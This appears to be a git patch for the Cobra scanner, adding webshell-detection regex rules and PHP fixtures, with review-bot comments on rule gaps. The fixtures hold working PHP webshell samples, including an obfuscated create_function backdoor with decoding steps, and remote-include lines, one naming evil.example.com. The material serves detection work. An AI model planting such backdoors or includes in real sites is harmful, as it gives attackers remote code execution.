@@ -2,11 +2,24 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell34"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[ - \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) - ]]></match> + <match mode="regex-only-match"><![CDATA[\$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*]]></match> <level value="7"/> <test> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb']);]]></case> + <case assert="true"><![CDATA[$_POST['sa']($_POST['sb'],$_POST['sc']);]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sa($_POST['sb']); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $sb = $_POST['sb']; + $sa($sb); + ]]></case> + <case assert="true"><![CDATA[ + $sa = $_POST['sa']; + $_POST($sa ); + ]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml deleted file mode 100644 index 793f69f4..00000000 --- a/rules/CVI-360035.xml +++ /dev/null 
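Review bot: The direct-call branch of the CVI-360034 pattern, `\$_(?:POST|…)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|…)\[(['\"]\w+['\"]|\d+)\]`, only accepts quoted or purely numeric keys, so `$_POST[a]($_POST[b]);` with bare-word keys — the exact style used in this patch's own CVI-360007 (`$_GET[m]`) and CVI-360026 (`$_GET[c]`) samples — is not caught. `\[\s*(['\"]?\w+['\"]?)\s*\]` in both key positions covers quoted, bare and numeric keys. The fifth new case, `$_POST($sa );`, is not valid PHP (a superglobal array cannot be called); `$_POST['f']($sa);` is the realistic form and still matches via the `.{0,25}` before `\(`.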
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="str_pattern"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - \bJFolder|\bwebshell|\bvonloesch\.de|reDuh\.jsp|QQ:179189585|JSP\s*文件管理器|\bJSPSpy|\bKJ021320 - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml deleted file mode 100644 index eac29429..00000000 --- a/rules/CVI-360036.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="exec_cmd"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (?:(?:java\.lang\.)?Runtime)?\s*(\w+)\s*=\s*(?:java\.lang\.)?Runtime\.getRuntime\(\)[\s\S]*\1\.exec\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml deleted file mode 100644 index aa5482c7..00000000 --- a/rules/CVI-360037.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="exec_cmd2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.io\.)?ProcessBuilder\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360038.xml b/rules/CVI-360038.xml deleted file mode 100644 index deff809e..00000000 --- a/rules/CVI-360038.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="browse_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\.(listFiles|list|listRoots)\s*\(.+\.(readLine|read)\s*\(.+\.write\s*\()|(\.(readLine|read)\s*\(.+\.write\s*\(.+\.(listFiles|list|listRoots)\s*\() - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml deleted file mode 100644 index 48b4e716..00000000 --- a/rules/CVI-360039.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="create_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.io\.)?(FileOutputStream|PrintWriter|FileWriter|RandomAccessFile)\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml deleted file mode 100644 index f73abc12..00000000 --- a/rules/CVI-360040.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="upload_file"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*((java\.io\.)?ServletFileUpload|(com\.jspsmart\.upload\.)?SmartUpload)\(\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml deleted file mode 100644 index 00812f9b..00000000 --- a/rules/CVI-360041.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?ServerSocket\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml deleted file mode 100644 index 3ee29f02..00000000 --- a/rules/CVI-360042.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?Socket\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml deleted file mode 100644 index 2e268ba3..00000000 --- a/rules/CVI-360043.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="net_socket3"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - new\s*(java\.net\.)?InetSocketAddress\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml deleted file mode 100644 index 93d4bb95..00000000 --- a/rules/CVI-360044.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="http_connect"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\w+)\s*=\s*new\s*(java\.net\.)?URL\(.*?\)[\s\S]*\1\.openConnection\(\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml deleted file mode 100644 index 0932aee9..00000000 --- a/rules/CVI-360045.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_command"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - Runtime\.getRuntime\(\)\.exec - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml deleted file mode 100644 index 80b1b060..00000000 --- a/rules/CVI-360046.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_unicode"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (\\u00\w\w){3,} - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml deleted file mode 100644 index 71e740ad..00000000 --- a/rules/CVI-360047.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_class_invoke"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - \.getMethod\(.*?\.invoke - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml deleted file mode 100644 index 4eb69f9a..00000000 --- a/rules/CVI-360048.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_class_invoke2"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (?:(?:java\.lang\.reflect\.)?Method)?\s*(\w+)\s*=\s*.*\.getMethod\([\s\S]*\1\.invoke\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml deleted file mode 100644 index 22bcc137..00000000 --- a/rules/CVI-360049.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="java_url_loader"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - java\.net\.URLClassLoader - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml deleted file mode 100644 index 8ec8f236..00000000 --- a/rules/CVI-360050.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="sql_connect"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (java\.sql\.)?DriverManager\.(getConnection|registerDriver)\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360051.xml b/rules/CVI-360051.xml deleted file mode 100644 index b7bbdca2..00000000 --- a/rules/CVI-360051.xml +++ /dev/null @@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="sql_query"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - (ResultSet)?\s*\w+\s*=\s*\w+\.executeQuery\(.*?\) - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360052.xml b/rules/CVI-360052.xml deleted file mode 100644 index 9f41b62b..00000000 --- a/rules/CVI-360052.xml +++ /dev/null 
@@ -1,21 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="jdbc_drivers"/> - <language value="jsp"/> - <match mode="regex-only-match"><![CDATA[ - COM\.ibm\.db2\.jdbc\.app\.DB2Driver|COM\.ibm\.db2\.jdbc\.DB2XADataSource|COM\.ibm\.db2\.jdbc\.net\.DB2Driver|com\.informix\.jdbc\.IfxDriver|com\.informix\.jdbcx\.IfxXADataSource|org\.apache\.derby\.jdbc\.ClientDriver|com\.microsoft\.sqlserver\.jdbc\.SQLServerDriver|com\.microsoft\.jdbc\.sqlserver\.SQLServerDriver|com\.mysql\.jdbc\.Driver|org\.gjt\.mm\.mysql\.Driver|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|oracle\.jdbc\.driver\.OracleDriver|oracle\.jdbc\.xa\.client\.OracleXADataSource|com\.tongweb\.jdbc\.OracleDriverWrapper|org\.postgresql\.Driver|com\.sybase\.jdbc\.SybDriver|com\.sybase\.jdbc2\.jdbc\.SybXADataSource|org\.hsqldb\.jdbcDriver|com\.sybase\.jdbc3\.jdbc\.SybDriver|com\.kingbase\.Driver|dm\.jdbc\.driver\.DmDriver - ]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 3f77d873..5e597b1d 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -64,6 +64,9 @@ function curl($url){ if(!empty($cmd)){ require_once($cmd); + + // 这种扫不出来 + require $cmd; } highlight_file($cmd); @@ -117,6 +120,7 @@ function GetFile($host,$port,$link) $out = "GET $link HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n\r\n"; + $out .= "Connection: Close\r\n\r\n"; $out .= "\r\n"; fwrite($fp, $out); $contents=''; 
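Review bot: The added `require $cmd;` is annotated only with `// 这种扫不出来` ("this one is not detected"), which records a known false negative in a fixture with nothing that tracks it. A bare `require $var;` without parentheses is the ordinary shape of a file-inclusion sink, so the miss belongs to the rule rather than the fixture; I would make the marker English and greppable, e.g. `// FN: bare `require $var` is not matched by the include rules`, so the gap is not lost. The second hunk's duplicated `$out .= "Connection: Close\r\n\r\n";` carries no comment saying which rule it is meant to exercise; one line naming the rule id would do. Both enclosing function bodies start and end outside these hunks.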
@@ -138,4 +142,4 @@ function GetFile($host,$port,$link) $redis = new Redis(); $redis->connect('192.168.1.2', 6379); -$redis->auth('passwd123!#'); +$redis->auth('passwd123!#'); \ No newline at end of file diff --git a/tests/vulnerabilities/webshell.php b/tests/vulnerabilities/webshell.php index c6802f03..beea16b8 100644 --- a/tests/vulnerabilities/webshell.php +++ b/tests/vulnerabilities/webshell.php @@ -1,41 +1,41 @@ -<?php -//cvi-360001 -eval($_POST['C']); + //cvi-360002 -$a="ss"; -include("sss.jpg"); +include "sss.jpg"; +include("sss_tmp"); +require_once "http://www.test.com/sss.php"; + +//扫不出来.... +$a="http://www.test.com/sss.php"; +require_once $a; -//cvi-360003 -echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a); +///////////// //cvi-360004 $string = 'AABBCCDDEE'; preg_replace($_POST['A'], $_POST['B'], $string); - $user =$_GET['user'];preg_replace(chr(101),exec('whoami'),"aaaa"); $b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'; - //cvi-360006 换行就挂 $b = $_POST['B']; preg_replace($_POST['A'], $b, $string); +///////////// + //cvi-360007 -array_map("ass\x65rt",(array)$_REQUEST['expdoor']); +$func = new ReflectionFunction($_GET[m]); +echo $func->invokeArgs(array($_GET[c],$_GET[id])); + + //cvi-360008 //cvi-360009 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e)); -//cvi-360010 换行就挂 -$e = $_REQUEST['e']; -$arr = array($_POST['pass'],); -array_filter($arr, base64_decode($e)); +$ee = "eval()";array_filter($a, base64_decode($ee)); //cvi-360011 换行就挂 $newfunc = create_function(null,'assert($cmd);');$newfunc(); @@ -48,7 +48,8 @@ $fun = $_POST['fun'];$ newfunc = create_function('str',$fun); //cvi-360014 换行就挂的那种 -$a=$_GET['A'];$a($_GET['B']); +$a="eval(";$a($_GET['a']); + //cvi-360015 if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { 
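Review bot: The fixture's opening `<?php` tag is deleted on the new side of the first webshell.php hunk, so nothing in this hunk is PHP code any more — a PHP parser treats everything up to the next open tag as inline text. That is harmless for the `regex-only-match` rules these cases target, but it means this file can no longer validate any rule that parses the source (CVI-180001's `function-param-controllable` mode in this series looks like one — confirm), and it silently changes what removing the `eval($_POST['C'])` case proves. I would keep the open tag, or add a one-line header stating that the fixture is intentionally not parseable PHP and exists for regex rules only. The `//扫不出来....` note on the `require_once $a;` case documents a known miss; an English marker naming the rule id that should catch it (`// FN: not matched by CVI-360001`) would make it trackable.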
@@ -58,70 +59,95 @@ exit; } -//cvi-360016 -$string = "hello cobra"; -filter_var($string, FILTER_CALLBACK,eval($cmd)); +//cvi-360016 +filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); //cvi-360017 换行挂 -$string = "hello cobra"; -$func=$_POST['func'];filter_var($string, FILTER_CALLBACK,$func); +$op=array('options' => 'assert'); +filter_var($_REQUEST['pass'], FILTER_CALLBACK, $op); -//cvi-360018??????? -$data = mb_ereg_replace("[^A-Za-z0-9\.\-]","$_POST['replacement']",$data); - - -//cvi-360019??????? -$replacement=$_POST['replacement'];$data = mb_ereg_replace("[^A-Za-z0-9\.\-]",$replacement,$data); +//cvi-360018 一句话 +mb_ereg_replace('.*', $_REQUEST['op'], '', 'e'); +//cvi-360019 换行挂 +$e = "\ise"; +$data = mb_ereg_replace("/[^A-Za-z0-9\.\-]/","",$data,$e); //cvi-360020 array_walk($array,$_POST['func']); //cvi-360021 换行挂 -$func=$_POST['func'];array_walk($array,$func); + //cvi-360022 -eval(file_get_contents("php://input")) +ini_set('allow_url_include, 1'); // Allow url inclusion in this script +include('php://input'); //cvi-360023 特征值 GIF87a<?php BM<?php -//cvi-360024 +//cvi-360024 这什么玩意 $f=$c('',$d);$f(); -//cvi-360025 -$a=str_replace($bb=$cc);$a();$bb(); -$a=str_replace("$cc=$dd","Shanghai","Hello world!");$a();$cc(); +//cvi-360025 mdzz匹配不上 +$k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); + + +$mt="mFsKCleRfU"; +$ojj="IEBleldle"; +$hsa="E9TVFsnd2VuJ10p"; +$fnx="Ow=="; +$zk = str_replace("d","","sdtdrd_redpdldadcde"); +$ef = $zk("z", "", "zbazsze64_zdzeczodze"); +$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); +$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); +//分解步骤 +//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw=="))) //拼接后的语句 +//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==))) //执行完str_replace函数后,返回base64加密后的字符串 +//$zvm=create_function(@eval($_POST['wen'])); //执行完base64_decode 得到解密后的字符串 得到一句话木马 
密码是wen +$zvm(); //执行 + + +//cvi-360026 这个怎么用啊 +$cb= 'system'; +ob_start($cb); +echo $_GET[c]; +ob_end_flush(); + +$evalstr=""; +ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); +echo $_REQUEST['pass']; +ob_end_flush(); +assert($evalstr); + +ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); +echo $_REQUEST['pass']; +ob_end_flush(); -//cvi-360026 -ob_start("eval($cmd)"); //cvi-360027 -eval(php://input); +//找不到栗子 + +//cvi-360028 一句话 +eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); +eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); -//cvi-360028 特征值 -eval("?>". -cat /etc/passwd -//cvi-360029 特征值 -$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV"; +//cvi-360034 一句话 +$_POST['sa']($_POST['sb']); +$_POST['sa']($_POST['sb'],$_POST['sc']); -//cvi-360030 特征值 -$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2 +$sa = $_POST['sa']; +$sa($_POST['sb']); -//cvi-360031 特征值 -if(file_exists($settings['STOPFILE'])){$a="hello"} +$sa = $_POST['sa']; +$sb = $_POST['sb']; +$sa($sb); -//cvi-360032 特征值 -b374k; -c999shexit(); +$sa = $_POST['sa']; +$_POST($sa ); -//cvi-360033 特征值 -$OOO000000=urldecode; -1MSSYowqjzlVVAwAoHHFXzQ5Lc; -//cvi-360034 360014 -$a=$_GET['A']; $a($_GET['B']); ?> From 1533d3f5948eceb9d13589acbfea26647706f7f6 Mon Sep 17 00:00:00 2001 
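Review bot: Several of the new samples are not the shape a real webshell takes, so a regex tuned to them will match the fixture and miss the wild form: `ini_set('allow_url_include, 1');` puts the comma inside the string literal (the real call is `ini_set('allow_url_include', 1);`), and `eval(base64_decode(ZXZhbChi...));` passes an unquoted bare word where a sample would carry a quoted string. I would correct both to the form seen in the wild, since the `<test>` cases derived from this file are what the rules are checked against. The `//找不到栗子` and `//这个怎么用啊` lines are working notes; either resolve them or replace them with an English `// TODO:` naming what is missing.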
From: braveghz <braveghz@gmail.com> Date: Thu, 7 Sep 2017 11:34:00 +0800 Subject: [PATCH 18/29] Merge branch 'master' of github.com:braveghz/cobra # Conflicts: # rules/CVI-220001.xml # rules/CVI-360004.xml # rules/CVI-360005.xml # rules/CVI-360007.xml # rules/CVI-360012.xml # rules/CVI-360020.xml # rules/CVI-360021.xml # tests/vulnerabilities/webshell.php --- docs/index.md | 3 +- docs/labels.md | 1 + rules/CVI-360001.xml | 21 ++++ rules/CVI-360002.xml | 19 ++++ rules/CVI-360003.xml | 19 ++++ rules/CVI-360004.xml | 5 +- rules/CVI-360005.xml | 1 + rules/CVI-360006.xml | 19 ++++ rules/CVI-360007.xml | 10 +- rules/CVI-360008.xml | 22 +++++ rules/CVI-360009.xml | 22 +++++ rules/CVI-360010.xml | 13 ++- rules/CVI-360037.xml | 22 +++++ tests/vulnerabilities/webshell.php | 150 ----------------------------- 14 files changed, 161 insertions(+), 166 deletions(-) create mode 100644 rules/CVI-360001.xml create mode 100644 rules/CVI-360002.xml create mode 100644 rules/CVI-360003.xml create mode 100644 rules/CVI-360006.xml create mode 100644 rules/CVI-360008.xml create mode 100644 rules/CVI-360009.xml create mode 100644 rules/CVI-360037.xml delete mode 100644 tests/vulnerabilities/webshell.php diff --git a/docs/index.md b/docs/index.md index dd793f80..4f1e822b 100644 --- a/docs/index.md +++ b/docs/index.md @@ -48,7 +48,8 @@ | 290 | LB | Logic Bug | 逻辑错误 | | 320 | VO | Variables Override | 变量覆盖漏洞 | | 350 | WF | Weak Function | 不安全的函数 | -| 355 | WE |Weak Encryption | 不安全的加密 | +| 355 | WE | Weak Encryption | 不安全的加密 | +| 360 | WS | WebShell | WebShell | | 970 | AV | Android Vulnerabilities | Android漏洞 | | 980 | IV | iOS Vulnerabilities | iOS漏洞 | | 999 | IC | Insecure Components| 引用了存在漏洞的三方组件(Maven/Pods/PIP/NPM) | diff --git a/docs/labels.md b/docs/labels.md index ac3216ae..4f481680 100644 --- a/docs/labels.md +++ b/docs/labels.md 
@@ -26,6 +26,7 @@ | 320 | VO | Variables Override | 变量覆盖漏洞 | | 350 | WF | Weak Function | 不安全的函数 | | 355 | WE |Weak Encryption | 不安全的加密 | +| 360 | WS | WebShell | WebShell | | 970 | AV | Android Vulnerabilities | Android漏洞 | | 980 | IV | iOS Vulnerabilities | iOS漏洞 | | 999 | IC | Insecure Components| 引用了存在漏洞的三方组件(Maven/Pods/PIP/NPM) | diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml new file mode 100644 index 00000000..afdb2aec --- /dev/null +++ b/rules/CVI-360001.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell1"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[include "sss.jpg";]]></case> + <case assert="true"><![CDATA[include("sss_tmp");]]></case> + <case assert="true"><![CDATA[require_once "http://www.test.com/sss.php";]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml new file mode 100644 index 00000000..2544dfde --- /dev/null +++ b/rules/CVI-360002.xml 
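Review bot: The URL alternative in the new CVI-360001 pattern, `((http|https|file|php|data|ftp)\://.{0,25})['\"]`, only matches when at most 25 characters follow the scheme before the closing quote, so `require_once "http://evil.example.com/shells/c99.txt"` (31 characters after `http://`) is not flagged while the shorter `http://www.test.com/sss.php` in the test case is. Real remote-include payloads routinely exceed 25 characters, and CVI-360037 in this same series bounds the same alternative at `.{0,100}`; I would use `.{0,100}` here (or `[^\n'\"]{0,200}`) and add a test case with a long URL. Separately, `include "x.txt"` / `include "x.log"` are legitimate in some code bases, so the level-7 webshell verdict with the fix text `删除` (delete) deserves one sentence telling the reader to confirm the included path is attacker-writable before acting on it.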
